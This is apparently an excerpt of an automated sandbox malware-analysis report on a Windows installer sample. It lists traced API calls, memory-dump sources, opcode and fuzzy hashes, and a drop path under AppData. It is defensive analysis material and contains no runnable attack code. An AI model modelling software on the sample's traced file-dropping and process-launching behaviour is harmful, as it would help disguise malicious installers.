                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                    • String ID: %s%S.dll
                                                                                                                    • API String ID: 2200240437-2744773210
                                                                                                                    • Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                                    • Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
                                                                                                                    • Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                                    • Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                      • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                      • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                      • Part of subcall function 00405863: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                                      • Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3585118688-0
                                                                                                                    • Opcode ID: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
                                                                                                                    • Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
                                                                                                                    • Opcode Fuzzy Hash: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
                                                                                                                    • Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405BF0
                                                                                                                      • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                                      • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                      • Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\magmaet\clenched,?,00000000,000000F0), ref: 00401645
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401638
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                    • String ID: C:\Users\user\AppData\Local\magmaet\clenched
                                                                                                                    • API String ID: 1892508949-536943358
                                                                                                                    • Opcode ID: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
                                                                                                                    • Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
                                                                                                                    • Opcode Fuzzy Hash: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
                                                                                                                    • Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                                    • CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                                    Strings
                                                                                                                    • Error launching installer, xrefs: 00405876
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID: Error launching installer
                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                    • Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                                    • Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
                                                                                                                    • Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                                    • Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                                    • Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
                                                                                                                    • Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                                    • Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                                    • Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
                                                                                                                    • Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                                    • Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
                                                                                                                    • Instruction ID: 37e0958252648d02cff52253bcfdfe32609a82ce416cf41b7e12165f3d842d3a
                                                                                                                    • Opcode Fuzzy Hash: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
                                                                                                                    • Instruction Fuzzy Hash: 3A814571D04228CFDF24CFA8C944BADBBB1FB44305F25816AD456BB281C7789A96CF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
                                                                                                                    • Instruction ID: badab6c45d1579aebeb642038854a5de2f2e9fe133ee6b5741b25705484aa732
                                                                                                                    • Opcode Fuzzy Hash: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
                                                                                                                    • Instruction Fuzzy Hash: 9A816731D04228DBDF24CFA8C844BADBBB0FF44305F21856AD856BB281D7796A86DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
                                                                                                                    • Instruction ID: 661ade8e8f79e5a6005bf83598ee02ccf2e60dcd73e05bd09c6951c965a298a8
                                                                                                                    • Opcode Fuzzy Hash: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
                                                                                                                    • Instruction Fuzzy Hash: DC713471D00228CFDF24CFA8C944BADBBB1FB48305F25816AD846B7281D7799A96DF44
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                                    • Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
                                                                                                                    • Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                                    • Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                                    • Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
                                                                                                                    • Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
                                                                                                                    • Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00403203
                                                                                                                      • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
                                                                                                                    • SetFilePointer.KERNELBASE(00A495B9,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
